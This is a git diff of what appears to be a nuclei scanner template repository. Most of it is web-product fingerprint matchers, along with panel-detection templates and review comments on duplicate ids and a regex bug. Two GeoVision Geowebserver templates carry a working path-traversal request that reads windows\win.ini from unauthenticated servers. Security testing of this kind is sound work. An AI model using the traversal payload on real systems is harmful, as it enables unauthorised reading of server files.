    - - type: word name: visualware-myconnection-server words: - - - type: word name: vmedia-multimedia-publishing-platform words: - function toggle(targetid) - - type: word name: vmedia-multimedia-publishing-platform words: - class="video_00" - - type: word name: vmware-esx words: - content="vmware esxi - - type: word name: vmware-esx words: - document.write("" + id_eesx_welcome + ""); - - type: word name: vmware-esx words: - - - type: word name: vmware-esx words: - 'content="vmware esx ' - - type: word name: vmware-esx words: - document.write(id_esx_viclientdesc); - - type: word name: vmware-esxi words: - ng-app="esxuiapp" - - type: word name: vmware-esxi words: - - - type: word name: vmware-horizon words: - href='https://www.vmware.com/go/viewclients' - - type: word name: vmware-horizon words: - alt="vmware horizon"> - - type: word name: vmware-server-2 words: - content="vmware server is virtual - - type: word name: vmware-vcenter words: - /converter/vmware-converter-client.exe - - type: word name: vmware-vcenter words: - content="vmware vcenter - - type: word name: vmware-vcenter words: - /vmw_nsx_logo-black-triangle-500w.png - - type: word name: vmware-virtualcenter words: - content="vmware virtualcenter - - type: word name: vmware-virtualcenter words: - content="vmware vsphere - - type: word name: vmware-virtualcenter words: - url=vcops-vsphere/ - - type: word name: vmware-virtualcenter words: - the vshield manager requires - - type: word name: vmware-vrealize words: - 正在重定向到 vrealize operations manager web - - type: word condition: and name: vmware-vrealize-operations-manager words: - Identity Manager - VMware - - type: word name: vmware-vsphere words: - <meta name="description" content="VMware vSphere - - type: word name: vmwareview words: - <title>VMware View Portal - - type: word name: vnc words: - 微信数字投票 - content="微平台投票管理系统 - - type: word name: vp-asp words: - - - type: word name: vp-asp words: - src="vs350.js - - type: word name: vp-asp words: - 
shopdisplayproducts.asp?id= - - type: word name: vpn358system words: - class="form-actions j_add_ip_actions" - - type: word name: vpn358system words: - href="/lib/bootstrap/ico/favicon.ico" - - type: word name: vrv-desktop-application-system words: - vrv - - type: word name: vrv-desktop-application-system words: - var vver = $('#hidverify').val(); - - type: word name: vrv-im words: -

    连豆豆pc客户端

    - - type: word name: vrv-im words: - href="http://im.vrv.cn/server-securitycenter/password/goretrieval.vrv - - type: word name: vrv-im words: - class="loginusername" value="" placeholder="连豆豆账号/邮箱/手机号 - - type: word name: vrv-im words: - class="wj-text wj-title">下载信源豆豆

    - - type: word name: vrv-nac words: - id="modal_delay" - - type: word condition: and name: vrv-nac words: - localstorage.setitem('doctitle','北信源网络接入控制系统') - 欢迎登录北信源网络接入控制系统 - - type: word name: vts-cms words: - errmag - - type: word name: w7-officialaccounts words: - class="copyright">powered by
    微擎 - - type: word condition: and name: w7-officialaccounts words: - content="微擎,微信 - onsubmit="return formcheck();" class="we7-form"> - - type: word name: w7-officialaccounts words: - powered by we7.cc - - type: word name: wacintaki-poteto-bbs words: - wacintaki - - type: word name: wacintaki-poteto-bbs words: - by ranmaguy and marcello - - type: word name: wackopicko words: -

    welcome to wackopicko

    - - type: word name: wackopicko words: -

    wackopicko.com

    - - type: word name: wantit-erp words: - /javascript/js/witfunctions.js - - type: word name: wap words: - window.location = 'wap.htm' - - type: word name: waspd words: - pending waspd activities - - type: word name: wat-system words: - 生产经营计划统计一体化管理信息系统安装程序 - - type: word name: waterssslvpn words: - welcome.cgi?p=logo&signinid=url_default - - type: word name: wavetop-days words: - application/views/img/logo_wavetop.png - - type: word name: wdlinux-wdcpsystem words: - href="http://www.wdlinux.cn/bbs/index.php - - type: word name: wdlinux-wdcpsystem words: - linux云主机 - - type: word part: header name: wdlinux-wdcpsystem words: - "Set-Cookie: wdcpsessionid" - - type: word condition: and name: we7 words: - 微擎 - w7.cc - - type: word name: weatimages words: - <a href="http://nazarkin.name/projects/weatimages - - type: word name: weatimages words: - <meta name="generator" content="weatimages"/> - - type: word name: weatimages words: - <div align="center" class="weatimages_toppest_navig" style="text-decoration:underline;"> - - type: word name: web-control-panel words: - <td><img src="/images/wcpe.gif - - type: word part: header name: web-crossing-server words: - "Server: web crossing" - - type: word name: web-data-administrator words: - <form name="webform1" method="post" action="default.aspx" onsubmit="javascript:return webform_onsubmit();" id="webform1 - - type: word name: web-erp-network-system words: - window.location='/www/login.html' - - type: word name: web-wiz-rich-text-editor words: - <a href="http://www.richtexteditor.org" - - type: word name: web2project words: - </head><body>fatal error. 
you haven't created a config file yet.<br/><a href= - - type: word name: webalizer-log words: - <a href="http://www.webalizer.org - - type: word name: webalizer-log words: - <!-- generated by the webalizer ver - - type: word name: webalizer-log words: - <!-- webalizer version - - type: word name: webasyst-shop-script words: - <a href="http://www.shop-script.com - - type: word name: webasyst-shop-script words: - 'powered by webasyst shop-script <a href="http://www.shop-script.com/" style="font-weight: normal">shopping cart software</a>' - - type: word name: webbased-pear-package-manager words: - pear_frontend_web - - type: word name: webbased-pear-package-manager words: - <img src="?img=pear" width="104" height="50" vspace="2" hspace="5" alt="pear"> - - type: word name: webbuilder words: - src="webbuilder/script/wb.js - - type: word name: webengine-site words: - href="/webengine/images/common.css - - type: word name: webengine-site words: - location.href = "/webengine/web/"; - - type: word name: webgrind words: - <span id="invocation_sum"></span> different functions called in <span id="runtime_sum - - type: word name: webid words: - powered by <a href="http://www.webidsupport.com/">webid - - type: word name: webid words: - <meta name="generator" content="webid"> - - type: word name: webissues words: - <div id="header-right">webissues - - type: word name: webissues words: - <div><input type="hidden" name="__formid" id="field-login-__formid" value="login" /> - - type: word name: weblogic words: - WebLogic - - type: word name: weblogic words: - Hypertext Transfer Protocol - - type: word name: weblogic words: - <i>Hypertext Transfer Protocol -- HTTP/1.1</i> - - type: word name: weblogic words: - /console/framework/skins/wlsconsole/images/login_WebLogic_branding.png - - type: word name: weblogic words: - Welcome to Weblogic Application Server - - type: word name: weblogic words: - Error 403-- - - type: word name: weblogic words: - Error 404--Not Found - - type: word 
name: weblogic words: - Oracle WebLogic Server - - type: word condition: and name: webmin words: - Webmin - session_login - - type: word name: webmin words: - webmin server on - - type: word name: webpa words: - <td align="right"><div id="inst_logo"><img src= - - type: word name: webray-situation-awareness words: - 'class="disclaimer" style="color: #ffffff">《盛邦安全网站监控预警平台服务协议》</a>' - - type: word name: websidestory words: - http://websidestory.com - - type: word name: websidestory words: - websidestory code - - type: word name: websidestory words: - websidestory,inc. all rights reserved. u.s.patent no. 6,393,479b1 - - type: word name: websidestory words: - <!-- websidestory html for search --> - - type: word condition: and name: websvn words: - WebSVN - subversion - - type: word name: webtrust-cert words: - https://cert.webtrust.org/viewseal - - type: word name: weiphp words: - 本系统由<a href="http://www.weiphp.cn" target="_blank">weiphp</a>强力驱动 - - type: word name: weiphp words: - content="weiphp - - type: word name: weiphp words: - /css/weiphp.css - - type: word name: weisha-learningsystem words: - /utility/corescripts/widget.js - - type: word name: wellcare-health-management-system words: - href="/web/vfyphrmedical">健康档案</a></li> - - type: word name: wellcare-health-management-system words: - www.wellcare.cn - - type: word part: header name: weonlydo-product words: - "Server: weonlydo" - - type: word part: header name: westell-secure words: - "Server: wstl cpe" - - type: word name: whatweb words: - <body><center><table border=0><tr align=center><td><font color=red size=5>troy serial server</font></td></tr> - - type: word name: whatweb words: - network card access password: </b><input type=password size=16 maxlength=16 name=access_psw> - - type: word name: whfst-cms words: - 武汉富思特 - - type: word name: whir words: - css/css_whir.css - - type: word name: whir-ezoffice words: - ezofficeusername - - type: word name: whir-ezoffice words: - whirrootpath - - type: word 
name: whir-ezoffice words: - /defaultroot/js/cookie.js - - type: word name: whir-flexoffice words: - var flexofficepath="\/flexoffice" - - type: word name: whmcs words: - powered by <a href="http://www.whmcs.com - - type: word name: whmcs words: - <div id="welcome_box">please <a href="clientarea.php" title="login"><strong>login</strong></a> or <a href="register.php" title="register"><strong>register</strong></a></div> - - type: word name: whtzjkj-erp words: - href="/content/home/tzjlog.ico" - - type: word name: wildfly-server words: - wildfly project - - type: word name: willfar-interface-management-tool words: - the wasion software foundation - - type: word name: willfar-interface-management-tool words: - alt="接口应用管理工具" - - type: word name: windows-business-server words: - src="images/sbslogo.gif - - type: word name: windows-business-server words: - href="/remote">remote web workplace - - type: word part: header name: windriver words: - "Server: windriver-webserver" - - type: word part: header name: wing-ftp-server words: - "Server: wing ftp server" - - type: word name: winiis-isp-access-resource-management-system words: - winisp.gif - - type: word name: winmail-server words: - amax information technologies inc. 
- - type: word name: winmail-server words: - "pop3,smtp server: <font color=red>" - - type: word name: winmail-server words: - src="themes/default/images/mail_pic.jpg - - type: word condition: and name: winmail-server words: - encryptpwd - sessid - - type: word condition: and name: winmail-server words: - f_theme - pwdplaceholder - - type: word name: winmail-server words: - winmail mail server - - type: word condition: and name: winmail-server words: - "(build " - background="customer/winmail_bg11.jpg - - type: word name: winmail-server words: - src="customer/index_winmail_new.gif - - type: word name: winwebmail words: - winwebmail server - - type: word name: winwebmail words: - images/owin.css - - type: word name: winwebmail words: - <td class=newsdiv-mid2>邮局管理员可自行分配邮箱!</td> - - type: word name: winwebmail words: - type="hidden" name="secex" - - type: word name: winwebmail words: - href="images\hwem.css" - - type: word name: wireless-access-point-controller words: - var oemproductname = "mvc_howay6000" - - type: word name: wireless-access-point-controller words: - <select id = "selclangswitch" class="langswitch" onchange = "switchpagelanguage()"> - - type: word name: wireless-access-point-controller words: - 苏州汉明科技有限公司 - - type: word name: wireless-access-point-controller words: - var oemproductname = "mvc_howay6100") - - type: word name: wireless-access-point-controller words: - src="images/acchtext.png" - - type: word name: wireless-access-point-controller words: - 版权所有 © 2009-2017</div> - - type: word name: wise-education-cloud-masters words: - ctl00_contentplaceholder1_dlttopvideos - - type: word name: wisepower-oa words: - action="/wisepower/login.jsp - - type: word name: wiserice-system words: - /resources/metronic/scripts/hz-tools.js - - type: word name: wiserice-system words: - <h4>请在下框里画图形来提交登录 - - type: word name: wishoa words: - WishOA_WebPlugin.js - - type: word name: wishoa words: - wishoa_webplugin.js - - type: word name: wosign-ssl-cert words: - 
https://seal.wosign.com/tws.js - - type: word name: wosign-ssl-cert words: - https://seal.wosign.com/signature - - type: word name: wowza-media-server words: - <html><head><title>wowza media server - - type: word part: header name: wowza-wowzastreamingengine words: - "Server: wowzastreamingengine" - - type: word name: wq-cms words: - powered by <a href='http://www.wqcms.com - - type: word name: wq-cms words: - inc/wqcms.js - - type: word name: wq-cms words: - style/wangqi/style.css - - type: word name: ws-server words: - websocket servers index.html - - type: word name: wsncm-iot words: - class="login">物联网供应链与金融风险管理服务 - - type: word name: wsncm-system words: - class="login">wsncm动态仓单系统 - - type: word part: header name: wso2-carbon-server words: - "Server: wso2 carbon server" - - type: word name: wstmart words: - powered by wstmart - - type: word name: wstmart words: - href="/wstmart/home/ - - type: word name: wuliupingtai words: - static/styles/frame/basic.css - - type: word name: wuzhicms words: - <meta name="generator" content="wuzhicms - - type: word condition: and name: wuzhicms words: - content="wuzhicms - powered by wuzhicms - - type: word name: wygk-product words: - href="wrzcnet.ico - - type: word name: wygk-product words: - <a href="mailto:webmaster@wrzc.net - - type: word name: wygk-product words: - url = 'wrzcnet_vote.asp?stype=view'; - - type: word name: xampp words: - 'font-size: 1.2em; color: red;">new xampp' - - type: word name: xampp words: - 'content="xampp ' - - type: word name: xbrother-monitor words: - if (!getcookie("x_gu_sid" - - type: word name: xcyg-system words: - ">digital anywhere platform</h2>" - - type: word name: xdcms words: - system/templates/xdcms/ - - type: word name: xdoa-oa words: - http://www.xdoa.cn</a> - - type: word name: xdoa-oa words: - 北京创信达科技有限公司 - - type: word condition: and name: xecure-vpn words: - xnstyle.css - xecure vpn manager - - type: word name: xecurevpn words: - xnstyle.css - - type: word name: xenapp words: - 
window.location="/citrix/xenapp" - - type: word name: xheditor words: - xheditor_lang/zh-cn.js - - type: word name: xheditor words: - class="xheditor - - type: word name: xheditor words: - .xheditor( - - type: word name: xhlis-oa words: - <title>杏和区域检验业务协同平台登录界面 - - type: word name: xiaomayi words: - /template/ant/css/anthomecomm.css - - type: word name: xiaonaodai words: - http://stat.xiaonaodai.com/stat.php - - type: word name: xinhaisoft-system words: - 北京心海导航教育科技股份有限公司-中国心理网版权所有
    - - type: word name: xinhaisoft-system words: - ../regist.asp?school= - - type: word name: xinnet-enterprise-mail words: - 北京新网数码信息技术有限公司 版权所有 - - type: word name: xinnet-mail words: - src="cgijson/getloginimg.php?img=logo - - type: word name: xinnet-mail words: - /webmail//cssv2/tamail.css - - type: word part: header name: xitami words: - "Server: xitami" - - type: word name: xiuno words: - xiuno/xiunobbs - - type: word name: xjhtqy-crm words: - class="hidden-xs ewheaderrow"> - - type: word name: xjhyt-system words: - class="wrap login_wrap" - - type: word name: xjhyt-system words: - url(images/yh.jpg) - - type: word name: xmall words: - xmadmin.exirck.cn - - type: word name: xoops words: - include/xoops.js - - type: word name: xpaper words: - src="template/paper/ - - type: word name: xtoa-oa words: - /app_qjuserinfo/qjuserinfoadd.jsp - - type: word name: xtoa-oa words: - /images/default/first/xtoa_logo.png - - type: word name: xtoa-oa words: - src="systemfiles/js/iawebclientactivexcheck.js" - - type: word name: xuanniao-traffic-management-platform words: - 玄鸟流量管理平台 - - type: word name: xunruicms words: - alt="xunruicms" - - type: word name: xxl-job words: - 分布式任务调度平台XXL-JOB - - type: word name: xycms words: - advfile/ad12.js - - type: word name: xyhcms words: - power by xyhcms - - type: word name: yabb words: - yabbtime.gettime() - - type: word name: yabb words: - /yabb.js - - type: word name: yadongsoft-fs3 words: - 神盾fs3文档安全共享系统v2.0 - + - type: word + condition: and + name: yapi + words: + - YApi + - 可视化接口管理平台 - type: word name: yearning words: - id=subnet - - type: word name: yelala words: - /public/js/knockout-3.4.1.debug.js - - type: word name: yelala words: - '' - - type: word name: yfidea-oa words: - background="oa/images/index/oalogin.jpg" - - type: word name: yichao-crmreporting words: - href="/css/vendors~index.acfeb.css" - - type: word name: yichao-system words: - src="amy/webos/jpmanager.js" - - type: word name: yii-framework words: - get started 
with yii - - type: word name: yioks-campus-football-management-platform words: - - - type: word name: yiqi-cms words: - content="yiqicms - - type: word name: yirui-iras words: - /authjsp/login.jsp - - type: word name: yirui-iras words: - fe0174bb-f093-42af-ab20-7ec621d10488 - - type: word condition: and name: yiyu-opms words: - opms - opms管理系统,织蝶-企业应用系统为您的企业保驾护航 - - type: word name: yizhitong-e7 words: - name="hidden_isbiaozhun" - - type: word name: ymail-optical-content-reading words: - /ymail/default/js/menu.js - - type: word name: ymhome-oa words: - /yimioa.apk - - type: word name: yonyou-ism words: - sheight*window.screen.deviceydpi - - type: word name: yonyou-erp words: - login_main_bg - - type: word name: yonyou-erp words: - login_owner - - type: word name: yonyou-erp-nc words: - /nc/servlet/nc.ui.iufo.login.index - - type: word condition: and name: yonyou-fe words: - v_hedden - v_show - - type: word name: yonyou-grp-u8 words: - window.location.replace("login.jsp?up=1") - - type: word name: yonyou-intelligentplant words: - /modules/core/client/views/sidemenu.client.view.html - - type: word name: yonyou-ksoa words: - onmouseout="this.classname='btn btnoff'" - - type: word name: yonyou-rmis words: - href="clientfile/rmisupdate.exe - - type: word name: yonyou-seeyon-oa words: - /seeyon/USER-DATA/IMAGES/LOGIN/login.gif - - type: word name: yonyou-seeyon-oa words: - /seeyon/common/ - - type: word name: yonyou-seeyon-oa words: - M3 Server - - type: word name: yonyou-seeyon-oa words: - M1-Server - - type: word name: yonyou-seeyon-oa words: - /seeyon/user-data/images/login/login.gif - - type: word condition: and name: yonyou-seeyon-oa words: - seeyon - seeyonproductid - - type: word name: yonyou-seeyon-oa words: - var _ctxpath = '/seeyon' - - type: word name: yonyou-seeyon-oa words: - a8-v5企业版 - - type: word name: yonyou-seeyon-oa words: - /seeyon/ - - type: word name: yonyou-shop words: - url:"/shophome/ajaxgetcompetemessagelist.action", - - type: word name: 
yonyou-shop words: - $.post("/shopfront/shoppingcar/gotoshoppingcartajax.action",function(data){ - - type: word name: yonyou-shop words: - 北京用友政务软件股份有限公司 - - type: word name: yonyou-turbocrm words: - turboui.js - - type: word name: yonyou-u8 words: - getfirstu8accid - - type: word name: yonyou-u8-cloud words: - 开启u8 cloud云端之旅 - - type: word name: yonyou-uclient words: - http-equiv=refresh content=0;url=index.jsp - - type: word name: yonyou-ufida words: - /system/login/login.asp?appid= - - type: word condition: and name: yonyou-ufida-nc words: - ufida_iufo_over.png - ufida_nc.png - - type: word condition: and name: yonyou-ufida-nc words: - logo/images/ - ufida - - type: word name: yonyou-ufida-nc words: - logo/images/ufida_nc.png - - type: word name: yonyou-ufida-nc words: -
    - - type: word name: yonyou-ufida-nc words: -
    驭龙 - - type: word name: yulong-hids words: -

    yulong - a cool hids system.

    - - type: word name: yunanbao-yunxz words: - 'id=mtokenplugin width=0 height=0 style="position: absolute;left: 0px; top: 0px"' - - type: word name: yuneasy-ipcalling words: - 云翌ip呼叫中心 - - type: word name: yunec words: - href="/17rec.html" - - type: word name: yunhezi words: - ui/js/seaconfig.js - - type: word name: yunhezi words: - ui/skins/black/style.css - - type: word name: yunhezi words: - class="client-list dm-clear"> - - type: word name: yunkemail words: - action="/alimail/error/browserlog - - type: word name: yunkemail words: - content="阿里企业邮箱 - - type: word name: yunsuo words: - href="http://bbs.yunsuo.com.cn - - type: word name: yunsuo words: - - - type: word name: zhongshengsoft-crm words: - clientutil.isff=!clientutil.isie - - type: word name: zhongshengsoft-crm words: - alert("餐厅编号不能为空") - - type: word name: zhongtan-ndstart words: - var pubnewsarray - - type: word name: zhongtan-ndstart words: - "南大之星信息发布系统 " - - type: word name: zhongyou-system words: - background=zhongyou.jpg - - type: word name: zhongyou-system words: - 众友科技巡检管理软件 - - type: word name: zhu-ji-bao words: - 您访问的是主机宝服务器默认页 - - type: word name: zhu-ji-bao words: - <a href="http://z.admin5.com/" target= - - type: word name: zhuofansoft-cms words: - session.infocss.infocssurl - - type: word name: zidesoft-e6 words: - src="/static/images/login/btn-login.gif" - - type: word name: ziguanghuayu-attendance-management-system words: - 广州紫光华宇信息技术有限公司 - - type: word name: zimbra words: - ImgZimbraIcon - - type: word part: header name: zimbra words: - "Set-Cookie: ZM_LOGIN_CSRF" - - type: word name: zimbra words: - window._zimbramail - - type: word name: zimbra words: - content="zimbra - - type: word name: zipkin words: - <base href="/zipkin/"> - - type: word name: zizhujianzhan words: - content="模板系统xinnet - - type: word name: zizhujianzhan words: - href="msnim:chat?contact=xinnet@hotmail.com - - type: word name: zknet-attendance-management words: - 'onclick="showstate(gettext(''forgotten 
password'')) ' - - type: word condition: and name: zknet-attendance-management words: - zknet - zksoftware inc. - - type: word name: zknet-attendance-management words: - web考勤管理系统 - - type: word condition: and name: zkteco-security-management-system words: - src='/login/images/zksecurity.png' - 百傲瑞达 - - type: word condition: and name: zkteco-security-management-system words: - class="login-finger-btn disabled" - id="password_hidden" - - type: word name: zkteco-security-management-system words: - $(".copyright").text("copyright ? " + server_current_year + " zkteco co., ltd. all rights reserved"); - - type: word name: zkteco-system words: - class="m-btn zkgreen rnd" - - type: word name: zkwell-corrosion-monitoring-and-corrosion-protection-management-system words: - background-image:url(images/devicebg.jpg) - - type: word name: znv-digital-campus words: - list.asp?caseid= - - type: word name: zoneminder words: - zoneminder login - - type: word name: zonghousc-system words: - data-errormessage-value-missing="* 请录入用户名 - - type: word name: zonghousc-system words: - style/default/frui.css - - type: word name: zoom-search-engine words: - name="zoom_query" - - type: word name: zoommeeting words: - class="alert alert-success hideme zoom-newmessage" - - type: word part: header name: zope words: - "X-Powered-By: zope" - - type: word condition: and name: zotonic words: - /lib/js/apps/zotonic-1.0 - "powered by: zotonic" - - type: word name: zte-police-research-system words: - 深圳市中兴信息技术有限公司版权所有 - - type: word name: zte-police-research-system words: - src="img/gonanlogo.jpg - - type: word name: zuitu words: - help/zuitu.php - - type: word name: zxoa words: - obj.src = "createcheckcode.aspx?id"+strmath; - - type: word name: zxoa words: - name="button1" value="" onclick="javascript:return checkfrom();" id="button1" class="loginbtn" /> - - type: word name: zzcms words: - /inc/showuserlogin.php?style=h&t=math.random() - - type: word name: zzsmit-public-bicycle-management-system words: 
- href="/skins/bicycle/css/login.css" - - type: word name: zzzcms words: - Powered by <a href='http://zzzcms.com'>ZZZcms</a> - - type: word - name: bitwarden - words: - - <title page-title>Bitwarden Web Vault - - - type: word - name: OpenBSD relayd - part: header - words: - - "Server: OpenBSD httpd" - - - type: word - name: Hunchentoot - part: header - words: - - "Server: Hunchentoot" - - - type: word - name: weblate - words: - - Weblate - - - condition: and - - - type: word - name: Adobe Experience Manager (AEM) - part: header - words: - - "x-dispatcher:" - case-insensitive: true - -# digest: 4a0a00473045022100e28f74c69af652c367854dc369b14f824316aff2e7d606a11ce27b83eb00e079022036f335c41bb67fbbe860ec5a6e2152d9b99f836673aa2add3f6ebd7624f68097:922c64590222798bb761d5b6d8e72950 +# Enhanced by cs on 2022/02/08 diff --git a/poc/web/geovision-geowebserver-lfi-7595.yaml b/poc/web/geovision-geowebserver-lfi-7595.yaml index c0e7dbfcad..85d8f11be9 100644 --- a/poc/web/geovision-geowebserver-lfi-7595.yaml +++ b/poc/web/geovision-geowebserver-lfi-7595.yaml 
@@ -1,14 +1,21 @@ id: geowebserver-lfi info: - name: GeoVision Geowebserver 5.3.3 - LFI + name: GeoVision Geowebserver 5.3.3 - Local File Inclusion author: madrobot severity: high - description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. - reference: https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt - tags: geowebserver,lfi + description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion. + reference: + - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 2 + tags: packetstorm,geowebserver,lfi -requests: +http: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" @@ -16,7 +23,6 @@ requests: matchers-condition: and matchers: - - type: word words: - "bit app support" @@ -28,3 +34,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100f45b58cb50c20c8912b69076ae6fa4986b3a7193d9cc107529d887259042b1b2022078b79722d240466325335caf4bc3aa3eaa0e66cb5029a48cd6e8724eaed456af:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/geovision-geowebserver-lfi-7596.yaml b/poc/web/geovision-geowebserver-lfi-7596.yaml index 85d8f11be9..08261363a2 100644 --- a/poc/web/geovision-geowebserver-lfi-7596.yaml +++ b/poc/web/geovision-geowebserver-lfi-7596.yaml 
@@ -1,21 +1,15 @@ id: geowebserver-lfi info: - name: GeoVision Geowebserver 5.3.3 - Local File Inclusion + name: GeoVision Geowebserver 5.3.3 - LFI author: madrobot severity: high - description: GeoVision Geowebserver 5.3.3 allows remote unauthenticated attackers to disclose the content of locally stored files via local file inclusion. + description: A vulnerability in GeoVision Geowebserver allows remote unauthenticated attackers to disclose the content of locally stored files. reference: - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 - metadata: - max-request: 2 - tags: packetstorm,geowebserver,lfi + tags: geowebserver,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini" @@ -23,6 +17,7 @@ http: matchers-condition: and matchers: + - type: word words: - "bit app support" @@ -34,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f45b58cb50c20c8912b69076ae6fa4986b3a7193d9cc107529d887259042b1b2022078b79722d240466325335caf4bc3aa3eaa0e66cb5029a48cd6e8724eaed456af:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/git-web-interface.yaml b/poc/web/git-web-interface.yaml index c8e8b1510a..6d2e37d689 100644 --- a/poc/web/git-web-interface.yaml +++ b/poc/web/git-web-interface.yaml @@ -4,11 +4,12 @@ info: name: Git web interface author: dhiyaneshDK severity: low - tags: git metadata: - shodan-query: 'html:"git web interface version"' + max-request: 1 + shodan-query: html:"git web interface version" + tags: git,misconfig -requests: +http: - method: GET path: - '{{BaseURL}}' 
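Review bot: In poc/web/geovision-geowebserver-lfi-7596.yaml the new side drops the `classification` block, `max-request`, the `packetstorm` tag and the trailing `# digest:` line, and goes back from `http:` to the older `requests:` key, while the preceding file section puts that same richer revision into geovision-geowebserver-lfi-7595.yaml. Both files keep `id: geowebserver-lfi`, so the tree now holds one copy with a digest and one without under the same id, and a scan that loads the whole directory will presumably run or report the check twice. I would keep one file per id and keep the `http:` revision that carries the `# digest:` line. The same downgrade appears later in this patch in honeywell-web-controller.yaml and icinga-web-login.yaml, where the description, classification and `# digest:` line are removed and `http:` becomes `requests:`.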
@@ -21,4 +22,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 4a0a004730450220577939a771c748bfce13ca8c0bb449122de3b0ad0628fcbb0a7b9cd5af6a43a8022100a8f9cb2504ba2b3d1e2af9c8de3c52da2a7358d674a71f0d21bd5eaa7acce872:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/hashicorp-consul-webgui-7896.yaml b/poc/web/hashicorp-consul-webgui-7896.yaml new file mode 100644 index 0000000000..e1601600b0 --- /dev/null +++ b/poc/web/hashicorp-consul-webgui-7896.yaml @@ -0,0 +1,32 @@ +id: hashicorp-consul-webgui +info: + name: HashiCorp Consul WebGUI Detection + author: c-sh0 + description: Detection of HashiCorp Consul WebGUI + severity: info + metadata: + shodan-query: http.title:"Consul by HashiCorp" + tags: consul,webserver,panel +requests: + - method: GET + path: + - "{{BaseURL}}/ui/" + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - 'Consul by HashiCorp' + - '%22%2C%22CONSUL_COPYRIGHT_URL%22%3A%22https%3A%2F%2Fwww.hashicorp.com%22' + condition: or + extractors: + - type: regex + part: body + group: 1 + regex: + - "CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git a/poc/web/hashicorp-consul-webgui-7898.yaml b/poc/web/hashicorp-consul-webgui-7898.yaml index 8ed14af7c9..a157a7fed6 100644 --- a/poc/web/hashicorp-consul-webgui-7898.yaml +++ b/poc/web/hashicorp-consul-webgui-7898.yaml @@ -3,8 +3,8 @@ id: hashicorp-consul-webgui info: name: HashiCorp Consul WebGUI Detection author: c-sh0 - severity: info description: Detection of HashiCorp Consul WebGUI + severity: info metadata: shodan-query: http.title:"Consul by HashiCorp" tags: consul,webserver,panel diff --git a/poc/web/honeywell-web-controller-7996.yaml b/poc/web/honeywell-web-controller-7996.yaml deleted file mode 100644 index 332d7dc804..0000000000 --- a/poc/web/honeywell-web-controller-7996.yaml +++ /dev/null 
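Review bot: In the new poc/web/hashicorp-consul-webgui-7896.yaml the extractor regex `CONSUL_VERSION:.*([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})` leaves the dots unescaped and uses a greedy `.*`, so group 1 can capture the right-most digit-any-digit-any-digit run on the line rather than the version that follows the key. I would write it as `'CONSUL_VERSION:.*?([0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})'`, single-quoted so the backslashes survive YAML. The word matcher expects a URL-encoded `CONSUL_COPYRIGHT_URL` entry, which suggests the version may also be URL-encoded in the body, in which case the literal `:` would never match; that is worth checking against a real response. This file also shares `id: hashicorp-consul-webgui` with hashicorp-consul-webgui-7898.yaml, which the next hunk touches.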
@@ -1,23 +0,0 @@ -id: honeywell-web-controller - -info: - name: Honeywell XL Web Controller - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7130 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/standard/default.php' - - matchers-condition: and - matchers: - - type: word - words: - - 'Honeywell XL Web Controller' - - - type: status - status: - - 200 diff --git a/poc/web/honeywell-web-controller.yaml b/poc/web/honeywell-web-controller.yaml index 1386c6d5d6..332d7dc804 100644 --- a/poc/web/honeywell-web-controller.yaml +++ b/poc/web/honeywell-web-controller.yaml @@ -1,21 +1,13 @@ id: honeywell-web-controller info: - name: Honeywell Excel Web Control Login Panel - Detect + name: Honeywell XL Web Controller author: dhiyaneshDK severity: info - description: Honeywell Excel Web Control login panel was detected. - reference: - - https://www.exploit-db.com/ghdb/7130 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: edb,panel + reference: https://www.exploit-db.com/ghdb/7130 + tags: panel -http: +requests: - method: GET path: - '{{BaseURL}}/standard/default.php' @@ -29,5 +21,3 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502201cbade7e116f5a6461bc8f3247e57465c275928dd32e107dcd2fcef5007499e7022100a8805580e290eb54e4b1ce219ce329feda9ac13b5bec74addc47220b44738d15:922c64590222798bb761d5b6d8e72950 diff --git a/poc/web/icewarp-webclient-rce-8133.yaml b/poc/web/icewarp-webclient-rce-8133.yaml deleted file mode 100644 index a7494e8328..0000000000 --- a/poc/web/icewarp-webclient-rce-8133.yaml +++ /dev/null 
